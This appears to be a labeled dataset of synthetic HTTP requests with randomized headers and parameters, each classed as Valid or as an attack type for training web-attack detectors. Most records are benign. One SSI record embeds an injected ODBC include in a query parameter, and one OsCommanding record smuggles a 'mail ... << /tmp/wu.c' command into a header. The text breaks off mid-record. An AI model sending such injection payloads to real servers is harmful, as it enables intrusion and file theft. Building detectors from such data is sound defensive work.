Accept-Language: aidt-bn;q=0.0, usrca-bv, Ia-vtq;q=0.0, seaq-can, a-wlYesle;q=0.6
Cache-Control: max-age=5
Client-ip: 117.22.174.10
Cookie: VHp5jiifuouo9ie=54216;egts0smTfesmne=tpntiLl;feeeepea6itya=chi
Cookie2: $Version="3"
Date: Fri, 06 Jan 06 07:52:04 CET
ETag: W/"PO.0nk.t5LKkQW32zFf"
Expect: 100-continue
From: o2yoIi@nrSybWihss.biz
If-Modified-Since: Thu, 02 Dec 04 18:24:14 CET
If-Unmodified-Since: Thu, 03 Jul 08 09:42:34 UTC
If-Match: "PtUR9hcy.wLoq6nrw"
If-None-Match: "VOTMDPklm3dn0rxR"
If-Range: Tue, 02 Oct 07 24:44:40 CET
Max-Forwards: 59
MIME-Version: 7.7
Pragma: ttvtinD=tc6
Proxy-Authorization: NTLM N21ybW9TZ2Ezb2hsb2FPczV0Z2VuOHQybHJlaWdtbm8ybHM=
Authorization: NTLM YWl0ZWl0eGJoZnpSbmhlYXJwcm10b2ltbGVubjlLcnJlcXhvb2xBYXVlMmlZYWU1
Range: 282-,2-77614,032140-
Referer: /eHqbe0t/R1lp/ialrqnb/heedne.php3
TE: trailers,trailers
Trailer: User-Agent
User-Agent: nRc0qS http://www.trsCxu.fr
UA-CPU: PowerPC
UA-Disp: 893,913,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7486x696
Via: rfo4/7.9 www.9oIwocod.shtml
Transfer-Encoding: gzip
Upgrade: mtc/2.4, 2tb/3.3, uMmd0b/9.5, oua/7.8, sdtbe/1.8
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 247.175.0.48
X-Serial-Number: 67843918306515180
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1290
Start - Id: 6132
class: Valid
PUT /rDAotao7Alimee8795/506tHPh@f4m-mW/tNYioNmh/u82qOR5AsTDoayE8S/DtEni0Eisrtjo/a8kkhn8eh/afatMrUbhPioruydtlwd/nqdnyFae/rwShL.png? HTTP/1.1
Content-Length: 101
Content-Language: hhSiepa,e
Content-Encoding: compress
Content-Location: http://www.tinsane.cz/ymnmtva/mMHl/tep5/vhrq/sEidrs.cfm
Content-MD5: Mm9jNmVsZXRPeXRmZXRubg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 01 May 06 03:32:21 GMT
Last-Modified: Thu, 19 Jul 07 02:08:12 CET
Host: www.ithiSre3.com
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-age=8
Client-ip: 2.7.31.61
Cookie: F3nfi2ve=O hn;rObOnldaqkicn=f9TJAlb;aegseEs=eq8t)ddropeoam
Cookie2: $Version="901"
Date: Sun, 25 Jan 09 01:40:12 UTC
ETag: W/"_FBDSU67b-wSnH9-"
Expect: 100-continue
From: Etnnkns@tnee.fr
If-Modified-Since: Tue, 19 Jun 07 03:16:40 UTC
If-Unmodified-Since: Wed, 18 Apr 07 05:21:08 GMT
If-Match: *
If-None-Match: "OALIR4HglQOnc@@"
If-Range: Sat, 28 Feb 09 22:47:08 CET
Max-Forwards: 8936
MIME-Version: 4.3
Pragma: eobCeex=ox
Proxy-Authorization: Digest algorithm=cedo
Authorization: sasap heea=Vreahc3
Range: -29,06-
Referer: http://www.jcsi0.cz/w5p8i/eeinln/teTt/oe8m.php
TE: trailers,deflate,chunked;q=0.3
Trailer: Via
User-Agent: Mozilla/5.7 (X11; U; Linux i586 0.1; et-ls; rv:3.2.9) Gecko/54678627
UA-CPU: StrongARM
UA-Disp: 8680,157,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7265x3057
Via: Neqreu/1.2 31.96.129.45
Transfer-Encoding: gzip
Upgrade: hUaed/9.4, n1r/4.5, n0p/2.3
Warning: 335 www.isiR.js "eyuxr" 
X-Forwarded-For: 150.210.233.126
X-Serial-Number: 9298253900687
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

iibd=670584&daeundlceei7e=2&iIhekEh8itdDryo=0175746&iTaciarHahfnEdc=a&e78=d&eedetxe9narasmh=eaahrenls

End - Id: 6132
Start - Id: 17722
class: Valid
GET /yaA.EDqrHrlocationA/si/nlibPZVdivmocha/iwte0n5mayniafcaes/i1sU/sttepsbsoommeod/chntiibnksiyq.exe?er=une%2Brh&YEAg5processing-instructionUiCWX=17441&ti=74621957&zYTYJRaccess_log3eVdU=19127961&eemdaliibwSmnc=t%5Dcopyodrop8teobject&nu0ruhrdsl2z=%2F%25+nq&nbtkdnEqsea=gltrwinl70ue&ie1boturcd=9012953&.kmGbw=4784715&Shv06imeeben=esrtfhhD2dastnlx&mexu=eait HTTP/1.0
Host: 75.145.89.129:95
Connection: close
Accept: audio/basic, image/png
Accept-Charset: iso-8859-4, windows-1252;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=2814
Client-ip: 71.115.62.249
Cookie: cypnqivbf1icDk=63;qOeShuaetceg=ie8hno7uin6
Cookie2: $Version="8"
Date: Wed, 15 Mar 06 04:14:38 CET
ETag: "ezGD0D_nOcmF7nlcC"
Expect: nsea=3aSeeh;7utdaTs
From: 3rtp@bdmeene.uk
If-Modified-Since: Wed, 13 Apr 05 14:44:13 GMT
If-Unmodified-Since: Mon, 14 Nov 05 12:27:40 CET
If-Match: "tFV0I02q.n2vxjNjXR"
If-None-Match: "JkUleyCXA_@qlIaNIp"
If-Range: Sat, 11 Oct 08 06:33:03 GMT
Max-Forwards: 9574
MIME-Version: 4.2
Pragma: xntygO=hseio
Proxy-Authorization: zEte 4clo9ebe=enFNEn3b
Authorization: NTLM dHZocm50NHRkbnQ2eW5odGllb2phc2NVZm55aW5vaHd0
Range: -42
Referer: http://www.Tidtrhbs.cz/cxetoa/6s8fj4.swf
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: Mozilla/9.2 (X11; U; Linux i386 0.5; oE-ki; rv:7.2.2) Gecko/42919483
UA-CPU: PowerPC
UA-Disp: 2302,8459,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 7830x724
Via: FTP/1.3 213.0.208.78, HTTP/8.8 www.soes.jpg:13188, oateor/7.8 58.248.200.90:90960
Transfer-Encoding: identity
Upgrade: ysu8gl/4.4, Noh9/6.5, notw1t/9.9
Warning: 577 160.66.81.147 "ithtogzloe" "Tue, 25 Jan 05 24:45:30 UTC"
X-Forwarded-For: 102.74.69.231
X-Serial-Number: 197606037
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17722
Start - Id: 12658
class: Valid
GET /1.QyAeQVUcvdaOxwPCB/wW9eI4uyEEK/2ASLlWxml3yWMind2l/aMioktWshEtpi/fRbAftqnw.3input/eQEhrLyyt-ab_/wDE8/ni8atsQWD1FBP/1ogijrnu/yc/rmq.css? HTTP/1.1
Host: 44.107.232.172:80
Connection: close
Accept: application/rtf, video/mpeg
Accept-Charset: hz-gb-2312;q=0.0, utf-7;q=0.1
Accept-Encoding: *
Accept-Language: *
Cache-Control: Tho=iiv
Client-ip: 79.57.186.209
Cookie: 3eagnrngocrd2=t/kegPnodethdservices;otioaRii8t9f4s=o$9esfr;lbrr0ldaan=$ltosB
Cookie2: $Version="298"
Date: Mon, 21 Apr 08 01:46:39 GMT
ETag: "pADaZgPpCbC26e1ukNJy"
Expect: rnrre
From: ensmuise@t5l1rto.st
If-Modified-Since: Wed, 09 Feb 05 15:23:56 CET
If-Unmodified-Since: Wed, 22 Nov 06 10:18:29 CET
If-Match: *
If-None-Match: *
If-Range: "@PzBPmDR0kWb05jHb-"
Max-Forwards: 328
MIME-Version: 9.7
Pragma: Fa=lt
Proxy-Authorization: lurbg Evlf=amwit8
Authorization: NTLM YWZic0llYXBpaW90eHBwaWxSMzV0aWVwYnBkbGFlZXNsZ2c=
Range: 4-14020,90205-
Referer: /aStoe/eadesa/mhhbtheh/Tmjh/ohcxo66i.pdf
TE: trailers,deflate;q=0.8
Trailer: Range
User-Agent: udawejThTrLg
UA-CPU: PowerPC
UA-Disp: 9349,4319,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 961x7915
Via: HTTP/8.7 0.25.70.129, ife/1.6 15.169.105.84:16, 4.2 7.43.129.128
Transfer-Encoding: compress
Upgrade: njK/4.3
Warning: 665 www.JOuop.css:0947 "halpebxnaho1tefti" 
X-Forwarded-For: 204.159.248.29
X-Serial-Number: 67342985693
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12658
Start - Id: 40795
class: SSI
GET /onCv-q/td8U3on/0OQ-oZAM/jG9gUcqigZvgYn5EaCfg/iMJEqAcPAy1oNR/altuj7m4/UY/NdropQzGUmdropJxv/ovmgfhrdefstro/4BIQqHTWTg8/pas0qTjEnfoVX5PP/d0lH_1NV.htm?e2needooSuHism=inputtio&imusqt1bOinfh=e8LVfopC9&syfho5r2og8=936&fdivpGtaconnectMT2k=60&6i=%3C%21--%23odbc+statement%3D%22select++6of%2C+++yh%2C++++weruTsag+++++from+++++ossenrhb+++++order+++by+++8%2C+401%2C++++8%22++--%3E&P_IZdexecWdu=en&en7dsir=em&uC=ieln6tqp+Gtn&rcEge=e1ia+tr%243hmBelodhiT&ennenn0alcn5o=rmawxin9&dEyt4=8 HTTP/1.0
Host: 34.107.18.243:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 187.102.187.0
Cookie: csve3AAqtP9s=7;saHok=648
Cookie2: $Version="99"
Date: Sat, 19 Aug 06 09:54:44 CET
ETag: "Mkc9ZM08CabKyv1n"
Expect: nsirg=5AerheO;iropdi=icem1yli
From: iiljwdi@httr81j.de
If-Modified-Since: Thu, 14 May 09 20:47:47 UTC
If-Unmodified-Since: Tue, 13 Oct 09 23:02:24 UTC
If-Match: *
If-None-Match: "7FeRbcdHuDW8GL3r"
If-Range: *
Max-Forwards: 0
MIME-Version: 8.4
Pragma: nnletWa='td2ea'
Proxy-Authorization: Digest username="easT"
Authorization: NTLM eDFnYXNpYXRocnRlaml3bmN5cWVzcm4xNHRMYTR0eXBzdG5lYUVyRGFnN2VU
Range: -473515,10127-9,-129281
Referer: /hOdaon.htm
TE: trailers,trailers,trailers
Trailer: Authorization
User-Agent: Mozilla/2.9 (Machintosh; U; PPC 2.4; GU-nu; rv:8.6.4) Gecko/73585514
UA-CPU: 68000
UA-Disp: 5062,338,8
UA-OS: Win98
UA-Pixels: 4833x5333
Via: 4.9 28.139.46.148, HTTP/5.9 254.140.222.244, 9.6 www.nhedl.shtml
Transfer-Encoding: HtRp; esaeps=i2ta2re
Upgrade: hfheyu/3.0, aae/3.8, rsayt/5.1, moh1r/4.2, ryonhi/6.6
Warning: 512 www.zgaaa4Nn.html "tnlssOrNs" 
X-Serial-Number: 095022921
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40795
Start - Id: 31441
class: Valid
GET /0nnyoehsho/ts_dTmRLdXf.yF3-04L/7B/loSn/uJMXLITnw7-M/uGSayy1IYUR-7Zrs/bHe6N4jas/NtOYs/116BBuU2NwhLdQeF/rPH/tGCeuge/oRFh162MH-VD1@.php3?sEni1ei8dbtd=ie&niileireh=57&daldai9dpm=bgsoundua%28eeaetelnet%28++brasi&Rdperp=cmToOeoarp&oym=785 HTTP/1.1
Host: 31.16.88.7
Connection: soadle
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.9
Accept-Language: fPfnHety-tITn;q=0.3
Cache-Control: no-store
Client-ip: 251.240.231.143
Cookie: Jas@xtermI=bTofH91gUISV;Istdactn1oo=$taoetajnelo;HLqejEp=Lgs s
Cookie2: $Version="471"
Date: Sun, 19 Oct 08 07:14:16 UTC
ETag: W/".7BiS1g@7A@OIIL-E"
Expect: snli
From: vconid@sswn.net
If-Modified-Since: Fri, 28 Jan 05 13:00:52 CET
If-Unmodified-Since: Thu, 30 Dec 04 24:50:32 CET
If-Match: *
If-None-Match: "_Bi7kB4rVoNRrYmgZ"
If-Range: Mon, 15 May 06 18:46:03 UTC
Max-Forwards: 933
MIME-Version: 2.0
Pragma: ns='atymapxa'
Proxy-Authorization: hchos tglefect=mpumcNne
Authorization: Basic YXNtMTA6SWhzMGE1bHQ=
Range: -77880
Referer: /tSs2eo.rar
TE: gzip;q=0.3
Trailer: Proxy-Authorization
User-Agent: 0a2tziudg
UA-CPU: PowerPC
UA-Disp: 4201,0533,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4140x395
Via: 9.9 www.KroeG.htm:299
Transfer-Encoding: identity
Upgrade: Ydta/8.0, aai/3.3, 2eoey/4.9, eyfn/6.3
Warning: 570 www.amtnyt.css "5OiaaianduesipSirte" "Sun, 30 Nov 08 08:56:41 UTC"
X-Forwarded-For: 187.213.56.17
X-Serial-Number: 564179198161988661
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 31441
Start - Id: 32766
class: Valid
POST /cp/owja2/e_hpZEGGzXls07/ehmnioaooiieizaad/4qwK/pmk.Eyr-WeSBY/7EnlctgMranh/ftpx0c2/jdaotie/a9woYfZG9wNksFAwN/5k.gif? HTTP/1.1
Content-Length: 136
Content-Language: enlD
Content-Encoding: compress
Content-Location: /soah3/uc0it4e/sDtpy/boeGpd9.pl
Content-MD5: YW9qcDFhdGVneXVvZ25haQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 31 Oct 04 14:19:31 UTC
Last-Modified: Wed, 17 Jun 09 14:10:49 CET
Host: www.8on8nuFt.ch
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 230.181.60.217
Cookie: fu1a6eaeftbswj=3054;d9l2rf6uyi=detisnhd30cdpdBq;b4pds3urcp@%uS=2%29l%22bE%2Fs4o%3Asue%22f;9yeCw=stuan;imyoei=aKR4AXhJtxir
Cookie2: $Version="4"
Date: Mon, 17 Oct 05 23:19:38 GMT
ETag: "iZ8m4dCHifFiyoUCsppk"
Expect: poeint
From: eadg@itnjs.uk
If-Modified-Since: Sun, 30 Nov 08 06:34:09 CET
If-Unmodified-Since: Mon, 30 Mar 09 06:43:42 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 09 Mar 06 20:53:42 CET
Max-Forwards: 40
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest response="810252cB7DBdEdc5Ced1969c56D3733D"
Authorization: Basic cmVldG51c2Y6Zm5tc2Zl
Range: 7780-1621,55-
Referer: /eend8t/czadapm.zip
TE: chunked;q=0.5,chunked;q=0.9,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/2.6 (Machintosh; U; Mac OS X 8.8; um-ri; rv:7.8.8) Gecko/72599704
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 322x281
Via: egsea/7.2 202.84.23.234, HTTP/8.4 252.116.162.153:05451
Transfer-Encoding: identity
Upgrade: cwnm/1.8, Pcnvc/2.3, tr9/5.6, ra7/0.0, seaag/7.9
Warning: 309 2.67.53.162:35 "k3rxAc0rieoX" 
X-Forwarded-For: 233.105.54.63
X-Serial-Number: 59787959
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

TOIZ=nxcopynalrrn  xm&IQwferqdn=oath4taiowe&zn6ccr=mYsR&NEorWSabniunion=HNafaSeyt&tachnasccli=hqz8&eps8tlrgdrn8o=22065180&amo=h-RjE6GWGf

End - Id: 32766
Start - Id: 42946
class: OsCommanding
GET /eFQMkIxgy/teNrnoteDhaielan2/efUBoit/a52J2JUzj3bGd/WehutntwridsSjr7N6yg/a3x2Dvym84aAp0/9iDmk3X_YMI/nyZ2thonSvW4qsK5G@Ey.exe?lexecNti=2&duade=etae&L.4eatC.ABe=cYnfv4+nadmin5otl&0Vnpassthru=303&lsrrd=nti&Fpb.oa=hzs HTTP/1.0
Host: www.illhrwoidl.gov
Connection: close
Accept: */*;q=0.2
Accept-Charset: euc-jp, x-mac-ce;q=0.3
Accept-Encoding: mail   hjzBxfem@mrha.cksesL.gov   << /tmp/wu.c;
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 197.135.31.173
Cookie: ntaeytnEaag=491
Cookie2: $Version="9"
Date: Sun, 30 Nov 08 08:03:04 UTC
ETag: W/"2IWM3fKbCdqbqBX"
Expect: 100-continue
From: sN6gaeds@i320.fr
If-Modified-Since: Sun, 15 Feb 09 23:49:46 UTC
If-Unmodified-Since: Tue, 13 Jul 04 05:21:22 CET
If-Match: *
If-None-Match: "j1zF62DyJDRQL23iq@Cv"
If-Range: Tue, 17 Jan 06 03:37:55 UTC
Max-Forwards: 1771
Pragma: no-cache
Authorization: Digest realm
Range: 617596-54787,237716-,7115-
Referer: /eeoet9/pyuAch/hrcwadt3/dos5Ise.php4
Trailer: If-Modified-Since
User-Agent: tPCkV3Xu5 http://www.ehaewdnl.fr
UA-OS: FreeBSD
Via: 6.2 197.110.186.38:382
Transfer-Encoding: identity
Warning: 546 www.tgrptg.jpeg "ljhi5" 
X-Forwarded-For: 59.0.93.67
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42946
Start - Id: 13082
class: Valid
GET /8cnsirEe22O.aspx?bu=hguihmetaoptntt&swrhbm=7eR&a2n2S=s%29li%29wdpasswdsel&one2jaon2tiowx=ee5emcweqdk%3Ao&iehldiilp=5&yunYjl=4563901710&caamnsauoorpoo=0744845&errtewSrvjg=eq2TcpL&ausua6kao=68366874 HTTP/1.1
Host: 221.210.66.48
Connection: sh4nroa
Accept: audio/basic;q=0.8, image/jpeg;q=0.2
Accept-Charset: x-mac-arabic, iso-8859-6;q=0.7, euc-cn
Accept-Encoding: compress, deflate, deflate, deflate
Accept-Language: daa7c-it, Sn-telocC;q=0.0, rpNssn-lro;q=0.9, soiogt-uiy;q=0.9
Cache-Control: only-if-cached
Client-ip: 25.242.176.218
Cookie: bsC2fd=aea=sArllN;crtGrm6a=1772498;lmoWyflns=i a/ece
Cookie2: $Version="333"
Date: Tue, 27 Mar 07 12:17:49 CET
ETag: W/"2GzIXExg.E1kLKICeHg"
Expect: rTltdrq
From: rbhede@fta3ii.uk
If-Modified-Since: Sun, 11 Sep 05 09:16:47 CET
If-Unmodified-Since: Sat, 13 Aug 05 06:20:18 GMT
If-Match: *
If-None-Match: *
If-Range: "vRUgIY0@9l8zT22qhoT_"
Max-Forwards: 74
MIME-Version: 1.2
Pragma: eio='ei'
Proxy-Authorization: szdzqT tCdnv=acteb9
Authorization: Digest nonce
Range: 65780-,3-830,6-864
Referer: /nErreer/otgjhinc.fgf
TE: gzip;q=0.8,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/1.0 (Windows; U; Windows NT 9.3; ew-my; rv:4.5.8) Gecko/21471423
UA-CPU: 68000
UA-Disp: 271,129,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 880x583
Via: FTP/9.7 www.nseire.tiff, FTP/2.2 www.oPh4.jpeg
Transfer-Encoding: rtn3; ibnwsEQt=itnl
Upgrade: s5iqnh/8.3, kyo/5.0
Warning: 161 www.tnAtywSi.gif "Asn6andtlSit3rohtmr" 
X-Forwarded-For: 129.45.112.20
X-Serial-Number: 837041373393858
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13082
Start - Id: 10150
class: Valid
GET /eW-mmqR5UnT8k2Paz7/46HU/nEmnXZcPtA8Q4xlev/ai0lultiNizatar7r/oU9y/meoihgtenfnhd3nneag/JZu-TMw/lnWE_xnhttps%u/Z_zeRdocument04k/aCW2CIM6iDUybG15.mdb?dea5evhesAae=dOhttpst HTTP/1.0
Host: 33.32.29.62
Connection: snAtu1a2
Accept: image/*, video/quicktime, application/postscript
Accept-Charset: *;q=0.5
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-stale=2
Client-ip: 128.232.71.123
Cookie: tprsaO=pi5=:zdoitrhei;q_qnvlM.mfrom=viJbR-vvJ;itexhkpamuC8=vfncastrET;MboptT2xhBq=7099;1barez37I=dN558
Cookie2: $Version="9"
Date: Fri, 09 Apr 04 20:46:13 CET
ETag: W/"CWRCG.AwZFSBB7Ep"
Expect: OElh4ec
From: ohLlh9sd@bflghwyl.cz
If-Modified-Since: Tue, 09 Mar 10 24:14:16 UTC
If-Unmodified-Since: Thu, 26 Jun 08 22:12:45 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 21 Aug 06 01:22:25 UTC
Max-Forwards: 8
MIME-Version: 0.8
Pragma: nt='tMezs'
Proxy-Authorization: irimMo rnefpib=0rSnos
Authorization: glm8e peDf=es3roR
Range: 962502-,4-
Referer: http://www.asdmohsa.it/Anee.asp
TE: trailers
Trailer: TE
User-Agent: Mozilla/6.5 (Machintosh; U; PPC Mac OS X 4.5; xu-FE; rv:7.3.2) Gecko/31806088
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 012x3228
Via: 4.5 193.55.6.63
Transfer-Encoding: identity
Upgrade: l3e/2.5, egHtzo/5.6, 9nsfeo/0.0, ilws/3.1
Warning: 760 103.21.169.19 "ehktdthtsuo8twhig" 
X-Forwarded-For: 73.178.177.84
X-Serial-Number: 87261
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 10150
Start - Id: 18426
class: Valid
GET /nBSW4N@AU/nsTquheds4T/96homeVjbbetweenykxc0/hL/euurh5s8VAg3tts/sHnEsuceAo0TE4opelPe/oBr4n_n/YicIR.html?RlxO.kY_=39331226&iframeJ3MEPEgQJmocha=mseocdm+%2Be&aeGd0=lzg.BGjBox2i&smochaUW0C=r%26rmhuAurpt5r%29&aOGQWincludeCQlike3=inbl&solg=hee&Nofnej=lRdeh76yhwgetp2i&Paec2wzh6yo1rst=481594&ot=s1s3as&e9c86eugaoh=99880&ui=8823 HTTP/1.0
Host: www.ixrahsyT.de
Connection: keep-alive
Accept: audio/*, video/*
Accept-Charset: *;q=0.9
Accept-Encoding: identity;q=0.7, gzip;q=0.6, identity, identity, identity;q=0.6
Accept-Language: *
Cache-Control: max-age=0231
Client-ip: 188.106.227.101
Cookie: ttttReeaz=2686;oeaoheitiev1dln=chttpzy9;5oEtendeeH=omp\elITsih;adeewbner=845971
Cookie2: $Version="3"
Date: Sun, 26 Nov 06 05:50:05 GMT
ETag: "MLsxUTIJ@Hd0@Mi-2"
Expect: iftEr5=soa9fL;oik4z=Suya
From: tln6d@eaei.gov
If-Modified-Since: Sat, 04 Jul 09 22:40:17 CET
If-Unmodified-Since: Sun, 05 Nov 06 15:59:22 GMT
If-Match: *
If-None-Match: "Lv32v1A6lJapYh-Fpze"
If-Range: *
Max-Forwards: 8305
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM cjNtZWFMb1Ntc2J5cmVxbkRkb3lwUkVlZXJydDV0Ym5kb3I2SHR1b2lld2Vv
Authorization: sXeeoh rDswg=isec
Range: 039-,2756-53,000-768
Referer: http://htye.uk/a0ivy/l3Caes/noanaiz/urdrwkic.jpg
TE: chunked;q=0.5
Trailer: Transfer-Encoding
User-Agent: giinejNDec (iwMm@0jAY8)
UA-CPU: MIPS
UA-Disp: 9580,4552,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 4354x029
Via: 4.5 219.55.109.168, rrnses/6.1 196.6.98.229, 2.6 85.85.188.68
Transfer-Encoding: okAw5
Upgrade: er0ua/3.6
Warning: 667 www.dfn3lro.gif "uson3n" 
X-Forwarded-For: 94.17.82.121
X-Serial-Number: 562102259881666351
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18426
Start - Id: 15237
class: Valid
GET /mySagAc3ilSlo/dUr.cgi?thiedytdee26Naf=3821393669&lehxestlRldxtl=ai+ooee&agfeut=2&stmtot=sys9pbslein&Je5ce=6469390254&tehovo=+locationsA%28&ieeuhrl=98695 HTTP/1.0
Host: 64.133.73.124
Connection: keep-alive
Accept: application/rtf;q=0.0, audio/x-wav;q=0.7, video/mpeg
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: *;q=0.6
Cache-Control: max-age=8
Client-ip: 249.93.245.212
Cookie: Z9mf7Tjbecho@=|th
Cookie2: $Version="112"
Date: Tue, 30 Jun 09 14:26:46 GMT
ETag: "J8fgc0aHA-UT2chR-"
Expect: Saalqe
From: rwLjhtn@hMidWa4.fr
If-Modified-Since: Thu, 01 Dec 05 11:23:52 UTC
If-Unmodified-Since: Mon, 20 Sep 04 05:07:36 GMT
If-Match: "b6AzjdMuwikfDkgrvYM"
If-None-Match: "cix7pR7M9vofj2ncK"
If-Range: Fri, 25 Aug 06 21:43:33 CET
Max-Forwards: 0
MIME-Version: 9.5
Pragma: edulgee='r8'
Proxy-Authorization: vt6o Ret2w3r=bHEdy
Authorization: Basic YWVuYzplTnU0MWQ=
Range: 319-418673,22777-
Referer: http://xeey.st/oni8etn/emir.jsp
TE: deflate,chunked
Trailer: From
User-Agent: Mozilla/6.2 (X11; U; Open BSD i586 7.7; de-ee; rv:7.5.9) Gecko/95241910
UA-CPU: MIPS
UA-Disp: 4833,791,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 175x9558
Via: KLtRe/9.5 133.243.231.158:31, oaele/7.0 212.232.178.164
Transfer-Encoding: ahLre; aeoda=dphas
Upgrade: szO45Q/7.7, hf6/5.3
Warning: 878 www.sRseiin.tiff "2seA8AidrH" 
X-Forwarded-For: 186.115.86.145
X-Serial-Number: 64170789223686
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15237
Start - Id: 23563
class: Valid
GET /tiXsWnac-jcTfWTkRZ/TMscteerhae.jsp?aeda4idsOoli=nh77&iohndmaee=beh0T2rYlbi&n9k8ltlrgi6=hw8Qgg&iOc=a+n&iaolm3rcf7tve7=snneopoular&ashsogmixetleoo=2Taoatr&s4edfqit=lmuiT4cwOyey&6KrJF-Voaccess_logZ6=1sdmdritxTi0&a6oast3=rigopt&raFsjstcsiji1m=Trauumttahteonts&yitgodsruo=79748&hfc4z2=g1+h4caccess_logueh%3Careplace&Mmnl=1913510757 HTTP/1.1
Host: 228.46.42.99
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: awi-b;q=0.5, tneaofrc-ot97tnei;q=0.0, ns6yT-noe
Cache-Control: max-age=0
Client-ip: 7.170.79.83
Cookie: ry= 
Cookie2: $Version="77"
Date: Sun, 06 Mar 05 23:57:52 GMT
ETag: ".C0E33fXGDKq97j_pZ-Q"
Expect: rymdnp4s=m3he;caao=roae6o
From: caat@loSde.net
If-Modified-Since: Mon, 20 Oct 08 03:00:53 UTC
If-Unmodified-Since: Fri, 15 Aug 08 21:00:29 CET
If-Match: *
If-None-Match: "YTmAmiHvqYoG1XY"
If-Range: Mon, 20 Apr 09 05:48:58 CET
Max-Forwards: 7484
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: Basic dHJhSTppdDRkQWloaQ==
Authorization: Digest uri=http://epfcu.net/eh2eaJ0/gyah0u.gif
Range: 9-582047,9-,23678-00
Referer: /urtnwdu/clad/ldiswhe/arlpDErl.css
TE: gzip,trailers
Trailer: Referer
User-Agent: bnsedje3nf/6.1.5
UA-CPU: StrongARM
UA-Disp: 990,4504,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 4426x0282
Via: HTTP/3.0 108.217.156.174, HTTP/7.0 www.OnetrTcr.tiff
Transfer-Encoding: deflate
Upgrade: wsepm/7.5, 5aaet/0.7, No5jm/7.8, gbfr/4.3
Warning: 209 www.5t5s6.png "thwt9satrcduouI" "Wed, 18 Mar 09 14:43:45 CET"
X-Forwarded-For: 11.102.20.4
X-Serial-Number: 1009110184973666911
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23563
Start - Id: 34842
class: Valid
POST /Uwrneghrtcsy/oi9o7YVOEA70K@/-7DtDPJGkE.msf? HTTP/1.0
Content-Length: 202
Content-Language: I
Content-Encoding: compress
Content-Location: http://www.ge5noh.biz/b7fyc8/dlt5ajn2/idrphrsr/frNEre/mDye.rar
Content-MD5: VmFzcGFlR3J0bzRzNmExZA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 21 Mar 08 08:46:00 GMT
Last-Modified: Fri, 02 Feb 07 10:48:44 GMT
Host: 218.249.236.30
Connection: close
Accept: */*;q=0.5
Accept-Charset: hz-gb-2312;q=0.8, windows-1250
Accept-Encoding: compress;q=0.2, gzip;q=0.6, deflate, deflate;q=0.9, compress
Accept-Language: *
Cache-Control: to='dfeSie'
Client-ip: 16.40.155.255
Cookie: dauayrrieedtoaa=awpv7Raq;eeentene6v=snl1waarl c1
Cookie2: $Version="351"
Date: Fri, 20 Feb 09 03:23:45 UTC
ETag: W/"7An7aeT8x-TeZUSw2"
Expect: sgm8uo=A5aet9i
From: RtMDosh@STsWZttr.de
If-Modified-Since: Sat, 12 Dec 09 14:37:59 CET
If-Unmodified-Since: Thu, 15 Apr 10 21:53:27 GMT
If-Match: *
